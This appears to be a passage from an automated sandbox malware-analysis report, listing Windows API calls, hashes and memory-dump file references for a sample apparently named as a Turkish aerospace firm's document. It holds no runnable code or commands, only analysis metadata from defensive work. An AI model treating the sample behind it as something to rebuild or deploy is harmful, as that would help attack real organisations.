                                                                                                                                    • Opcode Fuzzy Hash: 4b7b4cfb7e2178ad698be85c98ca3298394e3633b46e59245841c724fc85ce03
                                                                                                                                    • Instruction Fuzzy Hash: DA414F71A0851AFBDF199F68C848BEEB775FB15330F21832AE425A62D0D7306954CB91
                                                                                                                                    APIs
                                                                                                                                    • GetInputState.USER32 ref: 001F38CB
                                                                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 001F3922
                                                                                                                                    • TranslateMessage.USER32(?), ref: 001F394B
                                                                                                                                    • DispatchMessageW.USER32(?), ref: 001F3955
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001F3966
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2256411358-0
                                                                                                                                    • Opcode ID: 42268c851a1f1c6f021bf04c8782a1e7ad7530f041dde4951bbbbcb02eccb443
                                                                                                                                    • Instruction ID: 27b40c538e52acbe0e1d38436c6f4dc363bfbca94cb3dbd9312783b33ba166bf
                                                                                                                                    • Opcode Fuzzy Hash: 42268c851a1f1c6f021bf04c8782a1e7ad7530f041dde4951bbbbcb02eccb443
                                                                                                                                    • Instruction Fuzzy Hash: 8B31D77094434AAEEB39CB34E85CBB637E8BB15349F14056DE672821E0E7F49A85CB11
                                                                                                                                    APIs
                                                                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,001FC21E,00000000), ref: 001FCF38
                                                                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 001FCF6F
                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,001FC21E,00000000), ref: 001FCFB4
                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,001FC21E,00000000), ref: 001FCFC8
                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,001FC21E,00000000), ref: 001FCFF2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3191363074-0
                                                                                                                                    • Opcode ID: 3b11e86ac979997e803dc3cb563cc6936858cb3205fa05aa1341e99f45ca714b
                                                                                                                                    • Instruction ID: 283376caaa185548d75f6564a2ea7f54a1b90081c15873bdb962bd64cf03374c
                                                                                                                                    • Opcode Fuzzy Hash: 3b11e86ac979997e803dc3cb563cc6936858cb3205fa05aa1341e99f45ca714b
                                                                                                                                    • Instruction Fuzzy Hash: E6314F7190420DAFDB24DFA5D984ABBFBF9EB14350B10842EF616D2140DB30AE41EBA0
                                                                                                                                    APIs
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 001E1915
                                                                                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 001E19C1
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 001E19C9
                                                                                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 001E19DA
                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001E19E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                    • Opcode ID: de3afb56e8d3ded7b4a2ec7a47610ea5b85a428f17246a8064f0444fe9013043
                                                                                                                                    • Instruction ID: f82175239c725627edca002ba7e17f305dfd595e0f34a2d2b041d7b581399d25
                                                                                                                                    • Opcode Fuzzy Hash: de3afb56e8d3ded7b4a2ec7a47610ea5b85a428f17246a8064f0444fe9013043
                                                                                                                                    • Instruction Fuzzy Hash: B331D171900259FFCB04CFA8DD98ADE3BB5EB54318F108225F921A72D1C7709944CB90
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00215745
                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0021579D
                                                                                                                                    • _wcslen.LIBCMT ref: 002157AF
                                                                                                                                    • _wcslen.LIBCMT ref: 002157BA
                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00215816
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 763830540-0
                                                                                                                                    • Opcode ID: e7995e2430d70f53c9de5b0f0d207f7b339cd340b067fdaa3bf070ca36a73229
                                                                                                                                    • Instruction ID: 1a55759543808ec3e533088613b05813ffea6c7556068fa3f376a269f0533e50
                                                                                                                                    • Opcode Fuzzy Hash: e7995e2430d70f53c9de5b0f0d207f7b339cd340b067fdaa3bf070ca36a73229
                                                                                                                                    • Instruction Fuzzy Hash: A221B134920628DADB209F60CC85AEEB7B8FFA4324F108256E919AA1C0D77089E5CF50
                                                                                                                                    APIs
                                                                                                                                    • IsWindow.USER32(00000000), ref: 00200951
                                                                                                                                    • GetForegroundWindow.USER32 ref: 00200968
                                                                                                                                    • GetDC.USER32(00000000), ref: 002009A4
                                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 002009B0
                                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 002009E8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4156661090-0
                                                                                                                                    • Opcode ID: cf4ebae789cb8de7251728d22b25df11f26e97b67f75aaaee11bc5c26bd2b064
                                                                                                                                    • Instruction ID: 056249b5a332878e7a0a13ce46767204fb4a8ac4d703d73f5a279b2abf5606aa
                                                                                                                                    • Opcode Fuzzy Hash: cf4ebae789cb8de7251728d22b25df11f26e97b67f75aaaee11bc5c26bd2b064
                                                                                                                                    • Instruction Fuzzy Hash: 12218179600204AFD704EF65D888AAEBBE9EF54700F148068E94AD7362CB70AD04CB50
                                                                                                                                    APIs
                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 001BCDC6
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001BCDE9
                                                                                                                                      • Part of subcall function 001B3820: RtlAllocateHeap.NTDLL(00000000,?,00251444,?,0019FDF5,?,?,0018A976,00000010,00251440,001813FC,?,001813C6,?,00181129), ref: 001B3852
                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 001BCE0F
                                                                                                                                    • _free.LIBCMT ref: 001BCE22
                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001BCE31
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                    • Opcode ID: c8c0ecda425dc2d7f0400cb6ad59c31506bc8a00f2721a3e957ebd00bc6e77a4
                                                                                                                                    • Instruction ID: 57e67a4a2cda897a2fcfc22d4c737347c37a04084fecfe91e3398e399100bb6e
                                                                                                                                    • Opcode Fuzzy Hash: c8c0ecda425dc2d7f0400cb6ad59c31506bc8a00f2721a3e957ebd00bc6e77a4
                                                                                                                                    • Instruction Fuzzy Hash: 20018476601215BF23211AB66C8CDFB6E6DDED6BA13254129F905DB201EF61CD0181F0
                                                                                                                                    APIs
                                                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00199693
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 001996A2
                                                                                                                                    • BeginPath.GDI32(?), ref: 001996B9
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 001996E2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3225163088-0
                                                                                                                                    • Opcode ID: 0af6c1c22de6fd57924770c14924e703b4b48e562ee15686825ee82f5183db54
                                                                                                                                    • Instruction ID: db3b105bdb4f76fe1dead13735e925ad8df2ac6c615c0418db7c71c695ef6be8
                                                                                                                                    • Opcode Fuzzy Hash: 0af6c1c22de6fd57924770c14924e703b4b48e562ee15686825ee82f5183db54
                                                                                                                                    • Instruction Fuzzy Hash: CD215E70802345EBDF119F68FC1C7E93BA9BB51366F20461AF415A61B0D77098A5CF98
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2931989736-0
                                                                                                                                    • Opcode ID: c5370346f9b5800946cb2bbc55e009a8551e77fb071efd99e4fcffccb0bace9d
                                                                                                                                    • Instruction ID: a9aec0f2c4c5dafe1a36332c70cbb2905a666de4993a72200cabb265d960c595
                                                                                                                                    • Opcode Fuzzy Hash: c5370346f9b5800946cb2bbc55e009a8551e77fb071efd99e4fcffccb0bace9d
                                                                                                                                    • Instruction Fuzzy Hash: F4019665A45E45FA970899129E52FFF739EAF323ACF844021FD149A241F760ED7082E0
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(?,?,?,001AF2DE,001B3863,00251444,?,0019FDF5,?,?,0018A976,00000010,00251440,001813FC,?,001813C6), ref: 001B2DFD
                                                                                                                                    • _free.LIBCMT ref: 001B2E32
                                                                                                                                    • _free.LIBCMT ref: 001B2E59
                                                                                                                                    • SetLastError.KERNEL32(00000000,00181129), ref: 001B2E66
                                                                                                                                    • SetLastError.KERNEL32(00000000,00181129), ref: 001B2E6F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                    • Opcode ID: 940d7b6e0fa95ec6cd57b57fa52b0043562b4435797a0827d7fab1bfa8f78522
                                                                                                                                    • Instruction ID: bd9a138846716deb0e89bc47b79698cfdf32f9b7a37bdef36a2e60cd2c5d8278
                                                                                                                                    • Opcode Fuzzy Hash: 940d7b6e0fa95ec6cd57b57fa52b0043562b4435797a0827d7fab1bfa8f78522
                                                                                                                                    • Instruction Fuzzy Hash: 1801CD3614561077C61367767C89DEB155DABE57757354428F839A32D2EF74CC0D4120
                                                                                                                                    APIs
                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?,?,?,001E035E), ref: 001E002B
                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?,?), ref: 001E0046
                                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?,?), ref: 001E0054
                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?), ref: 001E0064
                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?,?), ref: 001E0070
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                    • Opcode ID: 7d28a2097ba79eaa68c2af1462e026e855966cf10ae01b971d1a77e951901f9e
                                                                                                                                    • Instruction ID: 19d930eba8fd8a3a89e6b5be8dd2e239574d3aa2e8fbe41b84febdf3d47bd202
                                                                                                                                    • Opcode Fuzzy Hash: 7d28a2097ba79eaa68c2af1462e026e855966cf10ae01b971d1a77e951901f9e
                                                                                                                                    • Instruction Fuzzy Hash: 3E01A776640604BFDB125F6AEC48BEE7AEDEF48791F258114F905D2210DBB1DD808760
                                                                                                                                    APIs
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 001EE997
                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 001EE9A5
                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 001EE9AD
                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 001EE9B7
                                                                                                                                    • Sleep.KERNEL32 ref: 001EE9F3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                    • Opcode ID: 840827f713f0740f2c7d05f26b54fd9719b2cb9909d5a48a4ef0f68482a85ac0
                                                                                                                                    • Instruction ID: 9bad4be2a676bd61bfbcca13b1e4178c1b0cbdae847ecff7cd72730e9d96f60c
                                                                                                                                    • Opcode Fuzzy Hash: 840827f713f0740f2c7d05f26b54fd9719b2cb9909d5a48a4ef0f68482a85ac0
                                                                                                                                    • Instruction Fuzzy Hash: 3E015B35C41A29EBCF009FE6E85DAEDBBB8BB18704F114556E902B2242CB309590C7A1
                                                                                                                                    APIs
                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001E1114
                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E1120
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E112F
                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001E0B9B,?,?,?), ref: 001E1136
                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001E114D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 842720411-0
                                                                                                                                    • Opcode ID: b7ff3c631f3f5a696f5f030f3a3d84082a50214489bd0e6340da4fd6fedd071c
                                                                                                                                    • Instruction ID: 8e766090c2cca05b82c100446dbeedc85c51b01408d16278f0a807c5b0f4cb20
                                                                                                                                    • Opcode Fuzzy Hash: b7ff3c631f3f5a696f5f030f3a3d84082a50214489bd0e6340da4fd6fedd071c
                                                                                                                                    • Instruction Fuzzy Hash: EE011D79140705BFDB114F65EC4DAAA3B6EEF85360B244425FA45D7350DF71DC109A60
                                                                                                                                    APIs
                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001E0FCA
                                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001E0FD6
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001E0FE5
                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001E0FEC
                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001E1002
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                    • Opcode ID: 4e1579f8bab344b9a401c682ebf713e0faa1bdb9998bac16bea3ef191e7252c7
                                                                                                                                    • Instruction ID: 4a2576844eabb531e2c6a1b26a5daf58abec0b0c83e4dc9b8463e5e2c74b090e
                                                                                                                                    • Opcode Fuzzy Hash: 4e1579f8bab344b9a401c682ebf713e0faa1bdb9998bac16bea3ef191e7252c7
                                                                                                                                    • Instruction Fuzzy Hash: 6AF04F39180751BBD7215FA5AC4DF9A3B6EEF99761F218414F949C6291CE70DC408A60
                                                                                                                                    APIs
                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001E102A
                                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001E1036
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001E1045
                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001E104C
                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001E1062
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
